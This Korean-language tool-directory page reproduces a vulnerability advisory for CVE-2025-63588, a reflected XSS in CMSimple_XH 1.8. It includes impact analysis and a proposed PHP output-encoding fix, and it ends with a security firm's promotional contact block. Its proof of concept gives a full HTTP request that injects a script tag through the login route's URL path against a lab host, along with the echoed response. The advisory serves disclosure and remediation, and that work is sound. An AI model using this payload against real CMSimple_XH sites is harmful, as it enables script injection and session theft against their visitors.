Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2025-63588 — CVE-2025-63588에 대한 상세 개념 증명(PoC), CMSimple_XH 1.8의 반사형 XSS 취약점, CVSS 점수, 영향 분석, 및 안전한 코딩 수정 예제 포함. | Kitploit
도구/GitHubGitHub/cybercrewinc/cve-2025-63588
Vulnerability AnalysisExploitationWeb Application ExploitationWeb SecurityPenetration TestingLearning & Education
GitHubcybercrewinc/cve-2025-63588

CVE-2025-63588

CVE-2025-63588에 대한 상세 개념 증명(PoC), CMSimple_XH 1.8의 반사형 XSS 취약점, CVSS 점수, 영향 분석, 및 안전한 코딩 수정 예제 포함.

저장소 보기
9개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2025-63588 CMSimple_XH cmsimplexh 경로 처리에서의 반사형 크로스 사이트 스크립팅 (XSS)

추정 CVSS v3.1: AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:N → 6.1 (Medium) 할당된 CVE: CVE-2025-63588
제품: CMSimple_XH - 1.8 공급업체: CMSimple_XH - https://www.cmsimple-xh.org/

요약

CMSimple_XH 프론트 라우터 파싱 코드에서 동적 로그인 관련 입력을 처리하는 부분에 반사형 크로스 사이트 스크립팅(XSS) 취약점이 존재합니다. 애플리케이션은 요청 URI에서 가져온 공격자 제어 데이터를 적절한 출력 인코딩 없이 생성된 HTML(예: form action 속성 및 anchor href)에 직접 반영합니다. 공격자는 피해자가 방문할 경우 취약한 사이트의 컨텍스트에서 임의의 JavaScript가 실행되도록 하는 URL을 조작할 수 있습니다.

이는 반사형 XSS(비지속형)입니다. 악용하려면 피해자가 조작된 링크를 따라야 합니다. 공급업체에 통보되었으며, 이슈는 문서화되어 위의 CVE가 할당되었습니다.

영향

  • 클라이언트 측 코드 실행 — 임의의 JavaScript가 사이트의 컨텍스트에서 실행될 수 있습니다.
  • 정보 공개 — 스크립트가 DOM 콘텐츠와 클라이언트가 접근 가능한 쿠키 또는 토큰을 읽을 수 있습니다. 세션 쿠키가 HttpOnly로 설정되지 않은 경우 세션 토큰이 도난될 수 있습니다.
  • 세션 하이재킹 / 가장 — 토큰 유출로 인해 피해자 권한에 따라 계정 탈취가 가능할 수 있습니다.
  • 피싱 / UI 스푸핑 / 강제 작업 — 주입된 스크립트가 가짜 UI를 생성하거나, 사용자를 리디렉션하거나, 피해자의 세션에서 작업을 제출할 수 있습니다.

영향받는 구성 요소

취약점은 동적 경로 세그먼트를 파싱하여 페이지/템플릿 변수에 매핑하는 프론트 라우터 / index.php(또는 이에 상응하는 프론트 컨트롤러) 코드에서 비롯됩니다. 원시 경로 조각(CMSimple_XH 라우터에서 사용하는 ?Templates... 스타일 조각)이 페이지 템플릿에 전달되고 적절한 HTML 속성 인코딩 또는 살균 없이 HTML 속성에 주입되어, 주입된 <script> 태그나 기타 페이로드가 그대로 렌더링될 수 있습니다. 유사한 반사형 XSS 문제가 다른 웹 구성 요소에 대해 게시된 바 있으며, 일반적으로 신뢰할 수 없는 입력의 부적절한 출력 인코딩으로 인해 발생합니다.

개념 증명 (PoC)

이 PoC는 공격자가 제공한 입력이 반환된 HTML에 반영되어 피해자의 브라우저에서 실행되는 것을 보여줍니다.

요청:

root@kitploit:~
POST /cmsimplexh/?Templatesx6l81"><script>alert(1)</script>y92q9 HTTP/1.1
Host: 192.168.98.129:8080
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36
Connection: close
Cache-Control: max-age=0
Origin: http://192.168.98.129:8080
Upgrade-Insecure-Requests: 1
Referer: http://192.168.98.129:8080/cmsimplexh/?Templates&login
Content-Type: application/x-www-form-urlencoded
Sec-CH-UA: "Chromium";v="138", "Not;A=Brand";v="24", "Google Chrome";v="138"
Sec-CH-UA-Platform: "Windows"
Sec-CH-UA-Mobile: ?0
Content-Length: 45

login=true&keycut=z9U%21q2k%21F0&submit=Login
붙여넣은 이미지 20251006200014

응답:

root@kitploit:~
HTTP/1.1 200 OK
Host: 192.168.98.129:8080
Date: Mon, 06 Oct 2025 02:50:49 GMT
Connection: close
X-Powered-By: PHP/8.3.6
Set-Cookie: XH_2f636d73696d706c6578682f=v7hkld81biddtmoua1maptd18a; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Language: en

<!DOCTYPE html>
<html lang="en">
<head>
<meta http-equiv="content-type" content="text/html;charset=UTF-8">
<title>English Site Title – Login</title>
<meta name="robots" content="noindex">
<meta name="keywords" content="Enter list of comma separated keywords here">
<meta name="description" content="Enter website description for search engine results here">
<link rel="stylesheet" href="./assets/css/xhstyles.css" type="text/css">
<link rel="stylesheet" href="./templates/fhs-simple-2019/stylesheet.css" type="text/css">
<meta name="robots" content="noindex">
</head>
<body class="xh_login" onload="document.forms['login'].elements['keycut'].focus();">
<div class="xh_login"><h1>Login</h1><p class="xh_fail">You have entered a wrong password!</p><p><b>Site administration. Please enter password.</b></p><form id="login" name="login" action="/cmsimplexh/?Templatesx6l81"><script>alert(1)</script>y92q9" method="post"><input type="hidden" name="login" value="true"><input type="password" name="keycut" id="passwd" value=""> <input type="submit" name="submit" id="submit" value="Login"></form><p><a href="/cmsimplexh/?Templatesx6l81"><script>alert(1)</script>y92q9">Back</a></p> </div></body>
</html>
붙여넣은 이미지 20251006200122

피해자의 브라우저가 이 페이지를 렌더링하면 주입된 <script>alert(1)</script>가 실행됩니다. 붙여넣은 이미지 20251006204432 붙여넣은 이미지 20251006204517

action 속성을 안전하게 출력하기 위한 제안된 PHP 예제:

root@kitploit:~
$action_url = '/cmsimplexh/?' . rawurlencode($template_token);
echo '<form action="' . htmlspecialchars($action_url, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8') . '" method="post">';

크레딧

크레딧

할당된 CVE:** CVE-2025-63588

https://nvd.nist.gov/vuln/detail/CVE-2025-63588

발견자:株式会社CyberCrew / サイバークル

참고 자료

https://github.com/cmsimple-xh/cmsimple-xh/releases https://nvd.nist.gov/vuln/detail/CVE-2025-24576


✉️ 문의처

질문이나 상담이 있으시면 부담없이 연락주십시오.


🏢 株式会社CyberCrew

G1@4x

📞 Tel: 03-6853-5823
📧 Mail:[email protected]


📄 회사 개요

항목내용
회사명株式会社CyberCrew
주소東京都千代田区外神田1-18-13 秋葉原ダイビル6階

🔐 주요 서비스

🛡️ 보안 진단 및 위험 평가

조직의 취약점을 다각도로 분석하고 최적의 개선 방안을 제안합니다.

💻 침투 테스트

표적형, 시나리오형, LLM 펜테스트까지 대응 가능합니다.

🌒 다크웹 모니터링

기밀 정보 유출을 조기에 감지하고 신속히 대응합니다.

🎯 레드팀 훈련 및 사회공학

실전적인 공격 시나리오에 기반한 방어력 평가를 실시합니다.

🧠 보안 시스템 설계 및 컨설팅

개발 초기 단계부터 보안을 고려한 설계를 지원합니다.


🌐 공식 사이트:https://www.cybercrew.co.jp
🕒 CyberCrew — 당신의 신뢰할 수 있는 보안 파트너.

도구 다운로드